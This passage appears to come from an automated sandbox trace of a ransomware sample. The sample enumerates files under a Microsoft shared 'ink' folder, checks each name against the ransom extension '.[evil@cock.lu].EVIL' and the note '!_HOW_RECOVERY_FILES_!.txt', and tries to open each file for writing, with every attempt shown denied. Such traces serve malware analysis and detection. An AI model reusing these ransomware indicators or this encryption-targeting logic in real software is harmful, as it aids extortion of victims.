_SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.639] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\IPSEventLogMsg.dll") returned 70 [0088.639] wcscmp (_String1="IPSEventLogMsg.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.639] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="IPSEventLogMsg.dll") returned 0x0 [0088.639] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\IPSEventLogMsg.dll") returned 0x46 [0088.639] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\IPSEventLogMsg.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipseventlogmsg.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.639] GetLastError () returned 0x5 [0088.639] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.639] wcsstr (_Str="ipsfin.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.639] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml") returned 62 [0088.640] wcscmp (_String1="ipsfin.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.640] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ipsfin.xml") returned 0x0 [0088.640] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml") returned 0x3e [0088.640] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfin.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.640] GetLastError () returned 0x5 [0088.640] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.640] wcsstr (_Str="ipsfra.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.640] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfra.xml") returned 62 [0088.640] wcscmp (_String1="ipsfra.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.640] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ipsfra.xml") returned 0x0 [0088.640] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfra.xml") returned 0x3e [0088.640] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsfra.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.640] GetLastError () returned 0x5 [0088.640] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.640] wcsstr (_Str="ipshe.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.640] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipshe.xml") returned 61 [0088.641] wcscmp (_String1="ipshe.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.641] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ipshe.xml") returned 0x0 [0088.641] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipshe.xml") returned 0x3d [0088.641] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipshe.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshe.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.641] GetLastError () returned 0x5 [0088.641] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.641] wcsstr (_Str="ipshi.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.641] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipshi.xml") returned 61 [0088.641] wcscmp (_String1="ipshi.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.641] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ipshi.xml") returned 0x0 [0088.641] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipshi.xml") returned 0x3d [0088.641] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipshi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshi.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.641] GetLastError () returned 0x5 [0088.641] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.641] wcsstr (_Str="ipshrv.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.641] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipshrv.xml") returned 62 [0088.641] wcscmp (_String1="ipshrv.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.641] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ipshrv.xml") returned 0x0 [0088.641] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipshrv.xml") returned 0x3e [0088.641] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipshrv.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.642] GetLastError () returned 0x5 [0088.642] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.642] wcsstr (_Str="ipsid.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.642] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsid.xml") returned 61 [0088.642] wcscmp (_String1="ipsid.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.642] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ipsid.xml") returned 0x0 [0088.642] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsid.xml") returned 0x3d [0088.642] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsid.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsid.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.642] GetLastError () returned 0x5 [0088.642] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.642] wcsstr (_Str="ipsita.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.642] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsita.xml") returned 62 [0088.642] wcscmp (_String1="ipsita.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.642] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ipsita.xml") returned 0x0 [0088.642] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsita.xml") returned 0x3e [0088.642] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsita.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.642] GetLastError () returned 0x5 [0088.643] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.643] wcsstr (_Str="ipsjpn.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.643] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsjpn.xml") returned 62 [0088.643] wcscmp (_String1="ipsjpn.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.643] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ipsjpn.xml") returned 0x0 [0088.643] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsjpn.xml") returned 0x3e [0088.643] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsjpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.643] GetLastError () returned 0x5 [0088.643] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.643] wcsstr (_Str="ipskor.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.643] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipskor.xml") returned 62 [0088.643] wcscmp (_String1="ipskor.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.643] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ipskor.xml") returned 0x0 [0088.643] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipskor.xml") returned 0x3e [0088.643] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipskor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.644] GetLastError () returned 0x5 [0088.644] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.644] wcsstr (_Str="IpsMigrationPlugin.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.644] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\IpsMigrationPlugin.dll") returned 74 [0088.644] wcscmp (_String1="IpsMigrationPlugin.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.644] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="IpsMigrationPlugin.dll") returned 0x0 [0088.644] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\IpsMigrationPlugin.dll") returned 0x4a [0088.644] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\IpsMigrationPlugin.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsmigrationplugin.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.644] GetLastError () returned 0x5 [0088.644] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.644] wcsstr (_Str="ipsnld.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.644] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnld.xml") returned 62 [0088.644] wcscmp (_String1="ipsnld.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.644] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ipsnld.xml") returned 0x0 [0088.644] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnld.xml") returned 0x3e [0088.644] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnld.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.645] GetLastError () returned 0x5 [0088.645] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.645] wcsstr (_Str="ipsnor.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.645] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml") returned 62 [0088.645] wcscmp (_String1="ipsnor.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.645] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ipsnor.xml") returned 0x0 [0088.645] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml") returned 0x3e [0088.645] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.645] GetLastError () returned 0x5 [0088.645] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.645] wcsstr (_Str="ipsplk.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.645] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml") returned 62 [0088.645] wcscmp (_String1="ipsplk.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.645] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ipsplk.xml") returned 0x0 [0088.645] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml") returned 0x3e [0088.645] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsplk.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.645] GetLastError () returned 0x5 [0088.645] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.645] wcsstr (_Str="IpsPlugin.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.645] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\IpsPlugin.dll") returned 65 [0088.645] wcscmp (_String1="IpsPlugin.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.645] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="IpsPlugin.dll") returned 0x0 [0088.645] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\IpsPlugin.dll") returned 0x41 [0088.645] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\IpsPlugin.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplugin.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.646] GetLastError () returned 0x5 [0088.646] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.646] wcsstr (_Str="ipsptb.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.646] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml") returned 62 [0088.646] wcscmp (_String1="ipsptb.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.646] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ipsptb.xml") returned 0x0 [0088.646] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml") returned 0x3e [0088.646] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.646] GetLastError () returned 0x5 [0088.646] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.646] wcsstr (_Str="ipsptg.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.646] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml") returned 62 [0088.646] wcscmp (_String1="ipsptg.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.646] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ipsptg.xml") returned 0x0 [0088.646] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml") returned 0x3e [0088.646] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsptg.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptg.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.646] GetLastError () returned 0x5 [0088.646] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.646] wcsstr (_Str="ipsrom.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.646] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml") returned 62 [0088.646] wcscmp (_String1="ipsrom.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.646] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ipsrom.xml") returned 0x0 [0088.646] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml") returned 0x3e [0088.646] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrom.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrom.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.647] GetLastError () returned 0x5 [0088.647] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.647] wcsstr (_Str="ipsrus.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.647] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml") returned 62 [0088.647] wcscmp (_String1="ipsrus.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.647] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ipsrus.xml") returned 0x0 [0088.647] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml") returned 0x3e [0088.647] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipsrus.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsrus.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.647] GetLastError () returned 0x5 [0088.647] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.647] wcsstr (_Str="ipssrb.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.647] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrb.xml") returned 62 [0088.647] wcscmp (_String1="ipssrb.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.647] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ipssrb.xml") returned 0x0 [0088.647] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrb.xml") returned 0x3e [0088.647] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrb.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.648] GetLastError () returned 0x5 [0088.648] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.648] wcsstr (_Str="ipssrl.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.648] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml") returned 62 [0088.648] wcscmp (_String1="ipssrl.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.648] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ipssrl.xml") returned 0x0 [0088.648] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml") returned 0x3e [0088.648] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipssrl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssrl.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.648] GetLastError () returned 0x5 [0088.648] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.648] wcsstr (_Str="ipssve.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.648] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipssve.xml") returned 62 [0088.648] wcscmp (_String1="ipssve.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.648] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="ipssve.xml") returned 0x0 [0088.648] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipssve.xml") returned 0x3e [0088.648] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipssve.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipssve.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.648] GetLastError () returned 0x5 [0088.648] FindNextFileW (in: hFindFile=0x84b11dd260, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.648] wcsstr (_Str="ipstr.xml", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.648] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\ipstr.xml") returned 61 [0088.648] wcscmp (_String1="ipstr.xml", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.648] wcsstr 